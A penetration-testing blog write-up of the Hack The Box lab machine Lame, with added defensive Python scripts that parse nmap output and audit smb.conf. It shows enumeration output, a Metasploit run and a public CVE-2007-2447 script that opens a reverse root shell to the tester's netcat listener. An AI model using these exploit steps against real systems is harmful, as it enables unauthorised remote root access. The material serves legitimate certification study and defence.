Path to OSCP: Lame
As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.
As far as I can tell, Lame is the first machine ever to be released on HTB. It’s a very simple box, which I completed over 2 years ago when first joining HTB, but for the sake of completion I’ll be going through previously rooted boxes again for OSCP.
I start as always by updating /etc/hosts with the IP of the box and hostname.htb. It’s more convenient than recalling the IP, and there are a few future boxes where web requests require the FQDN to resolve correctly, so it’s something I got into the habit of doing as a very first step.
We start enumeration with a standard all-port nmap network scan, revealing a few listening services:
dr@nostromo:~$ sudo nmap -p- -A lame.htb
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-11 12:53 BST
Nmap scan report for lame.htb (10.10.10.3)
Host is up (0.033s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-p Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), Control4 HC-300 home controller (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%), Citrix XenServer 5.5 (Linux 2.6.18) (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2023-08-11T07:56:05-04:00
|_clock-skew: mean: 2h00m24s, deviation: 2h49m45s, median: 22s
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 37.16 ms 10.10.14.1
2 37.17 ms lame.htb (10.10.10.3)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 181.80 seconds
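The scan output above is the raw material for everything that follows, so it is worth turning it into something structured. The parser below is an added example and not part of the original post: it reads the port table from nmap's normal (non-XML) output and returns one record per open port, so the service and version strings can be checked against a software inventory or a vulnerability feed. The sample text is a constructed excerpt trimmed from the scan above.

```python
"""Parse the port table of nmap's normal output into structured records.

Added example for this write-up (not the post's own tooling). Works on the
text nmap prints to the terminal, which is what a write-up usually contains;
for automation the XML output (-oX) is the better source.
"""
from __future__ import annotations
import re

# "21/tcp open ftp vsftpd 2.3.4"  ->  port, proto, state, service, optional version text
_PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

def parse_nmap_ports(text: str) -> list[dict]:
    """Return a record for every port line found in nmap normal output."""
    records = []
    for raw in text.splitlines():
        m = _PORT_LINE.match(raw.strip())
        if not m:
            continue  # host-script output, traceroute, banners etc. are skipped
        port, proto, state, service, version = m.groups()
        records.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service,
            "version": (version or "").strip(),
        })
    return records

def find_service(records: list[dict], service_prefix: str) -> list[dict]:
    """Select open ports whose nmap service name starts with the given prefix
    (e.g. 'netbios' matches both netbios-ssn and the truncated netbios-p)."""
    return [r for r in records
            if r["state"] == "open" and r["service"].startswith(service_prefix)]

# Constructed sample: the port table from the scan in this post, trimmed.
SAMPLE_NMAP = """
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-p Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

if __name__ == "__main__":
    for rec in parse_nmap_ports(SAMPLE_NMAP):
        print(f"{rec['port']:>5}/{rec['proto']} {rec['service']:<12} {rec['version']}")
```

Feeding a real scan through this is as simple as `parse_nmap_ports(open("scan.txt").read())`; the version strings it returns (here `Samba smbd 3.0.20-Debian`) are what you compare against the versions a CVE description names.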
I can’t resist a quick look into the SMB file share first. A comment of “oh noes!” on the tmp share, with anonymous access permitted, seemed promising at first, but ended up being a red herring, with nothing of note to be found.
dr@nostromo:~$ smbclient -L lame.htb
Password for [WORKGROUP\dr]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
dr@nostromo:~$ smbclient \\\\lame.htb\\tmp
Password for [WORKGROUP\dr]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 11 13:49:53 2023
.. DR 0 Sat Oct 31 06:33:58 2020
.ICE-unix DH 0 Fri Aug 11 11:53:10 2023
vmware-root DR 0 Fri Aug 11 11:53:33 2023
.X11-unix DH 0 Fri Aug 11 11:53:36 2023
.X0-lock HR 11 Fri Aug 11 11:53:36 2023
5562.jsvc_up R 0 Fri Aug 11 11:54:12 2023
vgauthsvclog.txt.0 R 1600 Fri Aug 11 11:53:08 2023
7282168 blocks of size 1024. 5386512 blocks available
Likewise for FTP, nothing to help us.
Doing a little research on the service versions the nmap scan revealed, I find that Samba v3.0.20 has a “Username map script” exploit, with a module available in Metasploit.
I fire up Metasploit, load module multi/samba/usermap_script, and sure enough we’re straight in with root access. Easy!
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.3:39783) at 2023-08-11 13:22:00 +0100
id
uid=0(root) gid=0(root)
However, that’s not really in the spirit of OSCP, where Metasploit can only be used a single time. So, let’s see what else is out there to exploit this vulnerability.
The exploit is recorded as CVE-2007-2447 (CVE – CVE-2007-2447 (mitre.org)), described as “The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the “username map script” smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.”
A quick search for the CVE number brings me to amriunix/CVE-2007-2447: CVE-2007-2447 – Samba usermap script (github.com), which contains a script to execute a reverse shell by uploading the required payload string. After following the installation instructions, we open a netcat listener and run the script against the target. Once again we’re in as root, this time a bit more OSCP-appropriate!
dr@nostromo:/opt/CVE-2007-2447$ python usermap_script.py lame.htb 445 10.10.14.5 7777
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
dr@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.3] 52638
id
uid=0(root) gid=0(root)
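Both the SMB enumeration earlier (anonymous access to the tmp share, and nmap's `message_signing: disabled` note) and the CVE description above come down to smb.conf settings on the server. The audit script below is an added example, not the post's or any project's code: it parses an smb.conf, flags the `username map script` option together with whether the reported Samba version falls in the range the CVE text gives (3.0.0 through 3.0.25rc3; 3.0.25 final and later are treated as outside it), flags signing that is not enforced, and lists shares with guest access. The configuration it runs against is constructed to resemble what the enumeration above showed; the script path in it is a placeholder, not the box's real one.

```python
"""Audit an smb.conf for the conditions behind this write-up's findings.

Added example, not from the original post. Checks:
  * 'username map script' in [global] (the CVE-2007-2447 precondition), rated
    critical when the Samba version is within 3.0.0 .. 3.0.25rc3;
  * 'server signing' not set to mandatory/required (signing not enforced);
  * shares with guest access, rated higher when they are also writable.
"""
from __future__ import annotations
import re

AFFECTED_FROM = (3, 0, 0)   # first affected release
FIXED_AT = (3, 0, 25)       # 3.0.25rcN is affected, 3.0.25 final is not
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(rc\d+)?")

def samba_version_affected(version: str) -> bool:
    """True if a Samba version string such as '3.0.20-Debian' or '3.0.25rc3'
    is inside the range named in the CVE-2007-2447 description."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Samba version: {version!r}")
    numeric = tuple(int(x) for x in m.group(1, 2, 3))
    prerelease = m.group(4) is not None
    if numeric < AFFECTED_FROM or numeric > FIXED_AT:
        return False
    if numeric == FIXED_AT:
        return prerelease
    return True

def parse_smb_conf(text: str) -> dict:
    """Parse smb.conf into {section: {key: value}}. Samba treats keys as case-
    and whitespace-insensitive, so they are normalised; '#' and ';' are comments."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][" ".join(key.lower().split())] = value.strip()
    return sections

def _yes(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")

def _writable(share: dict) -> bool:
    for key in ("writable", "writeable"):
        if key in share:
            return _yes(share[key])
    return not _yes(share.get("read only", "yes"))  # Samba's default is read only

def audit_smb_conf(text: str, samba_version: str) -> list[tuple[str, str, str]]:
    """Return (severity, section, message) findings for the configuration."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []
    if "username map script" in g:
        affected = samba_version_affected(samba_version)
        findings.append(("critical" if affected else "medium", "global",
                         f"username map script = {g['username map script']}"
                         + (" on a Samba version in the CVE-2007-2447 range" if affected
                            else "; version outside the CVE-2007-2447 range, review the script")))
    signing = g.get("server signing", "default").lower()
    if signing not in ("mandatory", "required"):
        findings.append(("medium", "global", f"SMB signing not enforced (server signing = {signing})"))
    for name, share in conf.items():
        if name == "global":
            continue
        if _yes(share.get("guest ok", share.get("public", "no"))):
            w = _writable(share)
            findings.append(("high" if w else "low", name,
                             "guest access to a " + ("writable" if w else "read-only") + " share"))
    return findings

# Constructed sample resembling the enumeration results; the script path is a placeholder.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   ; placeholder path for the example, not a real file from the box
   username map script = /usr/local/bin/map-user.sh
   map to guest = bad user

[tmp]
   comment = oh noes!
   path = /tmp
   guest ok = yes
   writable = yes

[opt]
   path = /opt
   read only = yes
   guest ok = yes

[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   read only = yes
"""

if __name__ == "__main__":
    for sev, section, msg in audit_smb_conf(SAMPLE_SMB_CONF, "3.0.20-Debian"):
        print(f"[{sev:<8}] [{section}] {msg}")
```

Against the sample this reports the mapping script as critical (version 3.0.20 is in range), signing as not enforced, tmp as a writable guest share and opt as a read-only one, while print$ is silent because it has no guest access. The version check deliberately stops at 3.0.25 final, which the CVE text places outside the affected range; an upgrade past that line, or removing the `username map script` option, is what closes the issue.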